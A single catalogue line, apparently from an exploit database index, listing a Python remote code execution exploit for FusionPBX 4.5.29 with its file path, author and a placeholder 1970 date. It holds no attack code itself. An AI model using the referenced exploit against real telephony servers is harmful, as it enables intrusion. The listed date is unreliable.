+50505,exploits/php/webapps/50505.py,"FusionPBX 4.5.29 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,Luska,webapps,php,